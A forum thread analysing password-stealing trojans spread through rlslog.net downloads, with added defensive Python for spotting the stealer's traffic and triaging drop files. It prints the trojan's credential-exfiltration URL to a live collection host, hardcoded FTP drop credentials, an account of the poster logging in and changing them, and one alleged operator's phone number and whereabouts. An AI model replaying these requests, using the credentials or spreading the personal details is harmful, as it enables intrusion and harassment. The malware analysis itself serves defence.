Vektor
2009-06-12 20:52:22
It is a well known fact that rlslog.net is spreading iStealer trojans which collect all locally stored passwords. The last known trojan saved a file called u16event.dat and uploaded it via FTP to sv4.altushost.com. Usually an NSIS installer extracts 2 executable files, and one of them is the trojan (known names used are Server 89.exe, Iexplore.exe and Firefox.exe).
Now that FTP account no longer works. So I assumed they are spreading an updated trojan, and I was right. The method is the same: an NSIS installer extracts 2 executables into the Temp directory, one named after the installer and the other Fizezilla.exe (which is currently not detected by any antivirus). This trojan no longer uploads to FTP. The trojan is packed with a modified VBCrypt (local path to the encryption program's project: C:\A\oPWouwTmTKi.vbp / C:\A\tAwDaPtcNxjaUmGF.pdb ); it decrypts and executes a modified variant of iStealer, which collects all locally stored passwords and calls http://warezbb.info/Dont_Bother/index.php?action=add with the following parameters:
- a = resource type (e.g. 8 = no-ip, 10 = firefox password)
- u = URL
- l = login name
- p = password
- c = computer name
For example, for http://www.example.com , user: user, password: password, computer name: computer, the trojan would send an HTTP GET request for the following URL: http://warezbb.info/Dont_Bother/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72 (where "a" is 10 for Firefox passwords, "u" is the hex escaping of "http://www.example.com", etc.). For each password the trojan makes a request like this. Of course, warezbb.info is also hosted by altushost (91.214.44.123 = eu25.altushost.com).
warezbb.info wrote:
    Domain ID:D26912061-LRMS
    Domain Name:WAREZBB.INFO
    Created On:15-Nov-2008 22:10:18 UTC
    Last Updated On:02-Jun-2009 06:30:42 UTC
    Expiration Date:15-Nov-2009 22:10:18 UTC
    Sponsoring Registrar:Dynadot LLC (R259-LRMS)
    Status:CLIENT TRANSFER PROHIBITED
    Registrant ID:CP-47333
    Registrant Name:Shahrukh c/o Dynadot Privacy
    Registrant Organization:
    Registrant Street1:PO Box 701
    Registrant Street2:
    Registrant Street3:
    Registrant City:San Mateo
    Registrant State/Province:CA
    Registrant Postal Code:94401
    Registrant Country:US
    Registrant Phone:+1.6505851961
    Registrant Phone Ext.:
    Registrant FAX:
    Registrant FAX Ext.:
    Registrant Email:privacy@dynadot.com
    Admin ID:CP-47333
    Admin Name:Shahrukh c/o Dynadot Privacy
    Admin Organization:
    Admin Street1:PO Box 701
    Admin Street2:
    Admin Street3:
    Admin City:San Mateo
    Admin State/Province:CA
    Admin Postal Code:94401
    Admin Country:US
    Admin Phone:+1.6505851961
    Admin Phone Ext.:
    Admin FAX:
    Admin FAX Ext.:
    Admin Email:privacy@dynadot.com
    Billing ID:CP-47333
    Billing Name:Shahrukh c/o Dynadot Privacy
    Billing Organization:
    Billing Street1:PO Box 701
    Billing Street2:
    Billing Street3:
    Billing City:San Mateo
    Billing State/Province:CA
    Billing Postal Code:94401
    Billing Country:US
    Billing Phone:+1.6505851961
    Billing Phone Ext.:
    Billing FAX:
    Billing FAX Ext.:
    Billing Email:privacy@dynadot.com
    Tech ID:CP-47333
    Tech Name:Shahrukh c/o Dynadot Privacy
    Tech Organization:
    Tech Street1:PO Box 701
    Tech Street2:
    Tech Street3:
    Tech City:San Mateo
    Tech State/Province:CA
    Tech Postal Code:94401
    Tech Country:US
    Tech Phone:+1.6505851961
    Tech Phone Ext.:
    Tech FAX:
    Tech FAX Ext.:
    Tech Email:privacy@dynadot.com
    Name Server:NS5.ALTUSHOST.COM
    Name Server:NS6.ALTUSHOST.COM

ns5.altushost.com wrote:
    warezbb.info.  SOA    ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400)
    warezbb.info.  MX     0 warezbb.info
    warezbb.info.  NS     ns5.altushost.com
    warezbb.info.  NS     ns6.altushost.com
    warezbb.info.  A      91.214.44.123
    cpanel         A      91.214.44.123
    ftp            A      91.214.44.123
    localhost      A      127.0.0.1
    mail           CNAME  warezbb.info
    webdisk        A      91.214.44.123
    webmail        A      91.214.44.123
    whm            A      91.214.44.123
    www            CNAME  warezbb.info
    warezbb.info.  SOA    ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400)
The e-mail addresses shahrukh.it@live.com and shahrukh.it@gmail.com were used to register accounts on other forums by users who were selling rapidshare accounts. Registered nicknames: farrukh rkr, shahrukh_pro, shahrukh khalid, dr00n (rlslog.net staff), devilwing, etc.
http://www.webmasterforums.com/buy-sell-ad-space/16787-bulk-rapidshare-seller-offical-legit.html , user: shahrukh_pro wrote:
    Hey guys I Knw m new here but m a trsuted seller but only in bulks Legit Accounts One month Made from points BULK $4.5 Per Month or pr 10k Price may Differ for BULK Thankx Shahrukh.it@live.com Add me msn

http://www.bzimage.org/showthread.php?t=8534 , user: shahrukh_pro wrote:
    Hello Guys I am a Rapidshare Seller Also Available in bulk minimum 5 accounts one month fresh Created With points $5 Per month Accounts. shahrukh.it@live.com only Bulk buyers

http://www.domainnameforumz.com/showthread.php?t=5382 , user: shahrukh_pro wrote:
    m Selling it Buddy 1 Month just for $5 shahrukh.it@live.com add me if u want more

http://www.warezscene.org/archive/index.php/t-324816.html , user: BBproz wrote:
    Hey Guys I Got 1200+ Rapidshare Accounts And i am Giving That For a Simple Task First 10 Ppls Will Get 6 to 8 Months Accounts So Just Replay Here For The Task And Get Accounts :)
This is the same dr00n as the one registered on many blogs and forums that have rapidshare links:
http://www.pakgamers.com/forums/other/22818-ipod-shuffle-2.html , user: dr00n wrote:
    OK bro Max i can give is 3k If yes then sms me 03212879757 shahrukh
    i live in karachi clifton i can give 3000 but urgent sms me plz 03212879757

http://www.wiredpakistan.com/forums/viewtopic.php?id=2874 , shahrukh_pro wrote:
    Hey Guys M selling premium Rapidshare accounts m selling them very cheap shared accounts Rules: The account will be sold to 2 persons and u cant change the password.. 6 Months Account only for 1000 (8 Months Acc) 3 Months Account for 600 (4 Months Acc) 1 Month only for 250 (45 Days Acc)
    Anybody Interested Contact Me.. 03212879757 Shahrukh
    EDITED PACKAGES
    ...
    m live in karachi but it doesnt matter where do i live u have to pay in the form of mobile cards
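To pick the reporting call described in the post out of proxy logs, here is an added example (my own code, not anything from the post or from the malware): it decodes the hex-escaped parameters, names the resource type using only the two codes the post gives, and keeps just the password's length so the triage output does not re-leak the secret. The squid-style log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Resource type codes the post names; any other code is reported as unknown.
RESOURCE_TYPES = {"8": "no-ip", "10": "firefox password"}
# Reporting endpoint quoted in the post.
EXFIL_PATH = "/Dont_Bother/index.php"
URL_RE = re.compile(r"https?://\S+")


def parse_exfil_request(url):
    """Describe one stolen record if `url` is the stealer's 'action=add' call,
    else return None. Only the password's length is kept, not the secret."""
    parts = urlsplit(url)
    if not parts.path.endswith(EXFIL_PATH):
        return None
    # parse_qs percent-decodes every value (%68%74%74%70... -> "http...").
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("action") != ["add"]:
        return None
    field = lambda k: q.get(k, [""])[0]
    code = field("a")
    return {
        "c2_host": parts.hostname,
        "type": RESOURCE_TYPES.get(code, "unknown(%s)" % code),
        "url": field("u"),
        "login": field("l"),
        "password_len": len(field("p")),
        "computer": field("c"),
    }


def scan_log(lines):
    """Apply parse_exfil_request to every URL found in the given log lines."""
    hits = []
    for line in lines:
        for m in URL_RE.finditer(line):
            rec = parse_exfil_request(m.group(0))
            if rec:
                hits.append(rec)
    return hits


# Constructed sample (squid-style): one line carrying the exact URL from the
# post, one benign line.
SAMPLE_LOG = [
    "1244838742.123 203.0.113.5 TCP_MISS/200 GET http://warezbb.info/Dont_Bother/index.php"
    "?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D"
    "&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72 - DIRECT/91.214.44.123",
    "1244838743.456 203.0.113.5 TCP_MISS/200 GET http://www.example.com/ - DIRECT/192.0.2.10",
]
```

Matching on the path and `action=add` rather than on the host alone keeps the check useful when the same logger script is moved to another domain, as the later posts in this thread show happening.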
Vektor
2009-06-13 15:01:03

Another trojan that can be found in archives posted on rlslog.net is a password stealer written in Visual Basic that always comes with MSINET.OCX (usually with the hidden attribute). If you see MSINET.OCX in a downloaded archive with some executable files in it, don't execute anything and delete that archive. While the other trojan searches only for the Process Monitor and Ethereal / Wireshark window class names, this one also searches for WMWARE, VBOX, Sandboxie, Anubis, ThreatExpert, CWSandbox and JoeBox (http://www.opensc.ws/snippets/3558-detect-5-different-sandboxes.html). The trojan spreader's local path to this VB project: C:\Stealer\Server\Project1.vbp .
This trojan makes a text file with the following format:
Code:
    --------------------------------------------------
    Protocol:
    Username:
    Password:
    --------------------------------------------------
    HALF LIFE KEY:
    COUNTER STRIKE KEY:
    DREAMWEAVER ULTRA DEV4 KEY:
    SYMANTEC KEY:
    ADOBE PHOTOSHOP 7.0 KEY:
    NERO BURNING ROM 5 KEY:
    ULEAD PHOTOIMPACT 7.0 KEY:
    SIBELIUS 2 KEY:
    MIRC USERNAME:
    MIRC KEY:
    WINZIP NAME:
    WINZIP KEY:
    UT2003 KEY:
    THE SIMS KEY:
    THE SIMS HOT DATE KEY:
    THE SIMS HOUSE PARTY KEY:
    THE SIMS UNLEASHED DATE KEY:
    THE SIMS VACATION DATE KEY:
    PROJECT IGI 2 RETAIL KEY:
    BATTLEFIELD 1942 KEY:
    RAINBOW SIX III RAVENSHIELD KEY:
    THE GLADIATORS KEY:
    NEED FOR SPEED HOT PURSUIT 2 KEY:
    FIFA 2003 KEY:
    C&C GENERALS KEY:
    RED ALERT 2 KEY:
    TIBERIAN SUN KEY:
    --------------------------------------------------
    NO-IP User:
    NO-IP Pass:
    --------------------------------------------------
    Pidgin Info:
    --------------------------------------------------
    FileZilla Info:
    --------------------------------------------------
    Firefox Data:
    --------------------------------------------------
    Yahoo User:Text3
    Yahoo Pass:Text4
    --------------------------------------------------
The text file is named after the local computer name and is uploaded to ftp://jackfruit.justfree.com using the account jackfruit with password h870881 (e-mail used to register it: choaschoi@yahoo.com ).
ftp://jackfruit.justfree.com wrote:
    Connect to: (12.06.2009 9:12:40 PM)
    hostname=jackfruit.justfree.com
    username=jackfruit
    startdir=
    jackfruit.justfree.com=205.134.162.147
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 13 of 200 allowed.
    220-Local time is now 14:11. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 2 minutes of inactivity.
    USER jackfruit
    331 User jackfruit OK. Password required
    PASS ***********
    230-User jackfruit has group access to: vhosts
    230-OK. Current restricted directory is /
    230 4 Kbytes used (0%) - authorized: 2048000 Kb
    SYST
    215 UNIX Type: L8
    FEAT
    211-Extensions supported:
     EPRT
     IDLE
     MDTM
     SIZE
     REST STREAM
     MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*;
     MLSD
     TVFS
     ESTP
     PASV
     EPSV
     SPSV
     ESTA
     AUTH TLS
     PBSZ
     PROT
    211 End.
    Connect ok!
    PWD
    257 "/" is your current location
    Get directory
    TYPE A
    200 TYPE is now ASCII
    PASV
    227 Entering Passive Mode (205,134,162,147,52,21)
    LIST
    150 Accepted data connection
    Download
    Waiting for server...
    226-Options: -l
    226 2 matches total
    DELE VIC-PC.txt
    250-2 Kbytes used (0%) - authorized: 2048000 Kb
    250 Deleted VIC-PC.txt
Since the password is hardcoded in the trojan .exe, a password change prevents it from uploading anything to that FTP. So I changed the password for it (as long as the password is not h870881, no trojans can upload anything to it).
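For an incident responder who recovers one of these drop files (as happened with VIC-PC.txt above), here is an added example, my own code and not from the post: it parses the dash-separated layout quoted above into per-section fields and lists which labels actually carried a value, so the victim can be told what to rotate without the secrets being copied around again. The sample file is constructed, and treating "Text3"/"Text4" as leftover Visual Basic default captions (i.e. nothing captured) is my assumption.

```python
import re

# Section separator used in the drop file (50 dashes, as in the quoted format).
SEPARATOR = "-" * 50
# Assumption: "Text3"/"Text4" in the quoted Yahoo fields are leftover Visual
# Basic control captions, meaning nothing was captured; treat them as empty.
VB_DEFAULT = re.compile(r"^Text\d+$")
# "Label: value"; the non-greedy label stops at the first colon so that a
# value containing ':' (e.g. a password) is kept whole.
FIELD = re.compile(r"^([^:]+?):\s*(.*)$")


def parse_report(text):
    """Split a drop file into its dash-separated sections and return one
    {label: value} dict per section, keeping only fields that carry a value."""
    sections = []
    for chunk in text.split(SEPARATOR):
        fields = {}
        for raw in chunk.splitlines():
            m = FIELD.match(raw.strip())
            if not m:
                continue
            label, value = m.group(1).strip(), m.group(2).strip()
            if value and not VB_DEFAULT.match(value):
                fields[label] = value
        if fields:
            sections.append(fields)
    return sections


def exposed_labels(text):
    """Labels (not values) of everything the stealer captured, in file order:
    the list to hand to the victim as 'credentials/keys to change'."""
    return [label for sec in parse_report(text) for label in sec]


# Constructed sample in the quoted layout (all values are made up).
SAMPLE_REPORT = """--------------------------------------------------
Protocol: ftp
Username: alice
Password: s3:cret
--------------------------------------------------
HALF LIFE KEY:
MIRC USERNAME: alice
MIRC KEY:
--------------------------------------------------
NO-IP User: alice
NO-IP Pass: hunter2
--------------------------------------------------
Pidgin Info:
--------------------------------------------------
Yahoo User:Text3
Yahoo Pass:Text4
--------------------------------------------------
"""
```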
[-TE-]-Methodman
2009-06-13 16:35:13
Vektor
2010-12-09 16:05:28

New host for logs sent by trojans posted on rlslog.net: http://genuinekeyz.com/ (213.5.66.161 = hosted-by.altushost.com); each directory has a PHP logger used by a different trojan.
genuinekeyz.com wrote:
    Index of /
    Name       Last modified      Size  Description
    $ush       02-Sep-2010 12:30  -
    Hax0r      14-Sep-2010 14:30  -
    Jmr0x      12-Sep-2010 16:40  -
    NuW@n      27-Sep-2010 13:19  -
    X91i       14-Sep-2010 14:30  -
    cgi-bin    29-Sep-2010 19:39  -
    ftp        09-Dec-2010 13:08  -
    rcxxteer   17-Nov-2010 14:27  -
    s@nsh      27-Sep-2010 21:05  -
    xxxyxxx    27-Sep-2010 14:09  -
    Proudly Served by LiteSpeed Web Server at genuinekeyz.com Port 80
Desperate attempt from the same host (hosted-by.altushost.com) to spam this website:
79.142.64.19 = hosted-by.altushost.com wrote:
    Code:
    [11:42] <-TE-> Web report from IP: 79.142.64.19 ( snkpidz ): "ZVGyX1 <a href="http://fgdrkiehyebh.com/">fgdrkiehyebh</a>, [url=http://tygsodnozayu.com/]tygsodnozayu[/url], [link=http://nvgoxsubviop.com/]nvgoxsubviop[/link], http://szhcsrguujlm.com/"
    [11:42] <-TE-> Web report from IP: 79.142.64.19 ( bjypcb ): "jhSvEs <a href="http://jgfujmitzbgf.com/">jgfujmitzbgf</a>, [url=http://otocynzarxuq.com/]otocynzarxuq[/url], [link=http://jdwhcekkrhqv.com/]jdwhcekkrhqv[/link], http://saxjexabzpec.com/"
    [11:47] <-TE-> Web report from IP: 79.142.64.19 ( bzpnooudy ): "AvNWC0 <a href="http://nhgkkruaanzi.com/">nhgkkruaanzi</a>, [url=http://tvoxfaltnilx.com/]tvoxfaltnilx[/url], [link=http://sopxvbqagunz.com/]sopxvbqagunz[/link], http://tcwdbaypyxzc.com/"
    [11:47] <-TE-> Web report from IP: 79.142.64.19 ( deacwfs ): "eqCtOr <a href="http://dqxmxzrjnbry.com/">dqxmxzrjnbry</a>, [url=http://mqlclgipszbc.com/]mqlclgipszbc[/url], [link=http://tfeazpixszcd.com/]tfeazpixszcd[/link], http://dgivfccbmatu.com/"
    [11:52] <-TE-> Web report from IP: 79.142.64.19 ( hokzoblqr ): "hEJGA8 <a href="http://isssfggrhzef.com/">isssfggrhzef</a>, [url=http://zpougirxcydm.com/]zpougirxcydm[/url], [link=http://zxpiyovraqdo.com/]zxpiyovraqdo[/link], http://otxkueakvoql.com/"
    [11:53] <-TE-> Web report from IP: 79.142.64.19 ( fsrvfpkrlw ): "QjquHE <a href="http://oswdqyquaneh.com/">oswdqyquaneh</a>, [url=http://zldfsovgixrx.com/]zldfsovgixrx[/url], [link=http://ftxfygnqeprq.com/]ftxfygnqeprq[/link], http://wzvygxjuztez.com/"
    [12:00] <-TE-> Web report from IP: 79.142.64.19 ( htepqwntaf ): "rbZj9i <a href="http://otbytyucwmrr.com/">otbytyucwmrr</a>, [url=http://acdnzrxgqmqf.com/]acdnzrxgqmqf[/url], [link=http://dmoxjigrcbon.com/]dmoxjigrcbon[/link], http://vicfoupnvkmu.com/"
nemesis.te-home.net wrote:
    [2010-12-09 01:44:21] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
    ...
    [2010-12-09 02:13:20] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
    [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
    [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    [2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
    ...
    [2010-12-09 02:24:27] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    [2010-12-09 02:24:27] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
Fail.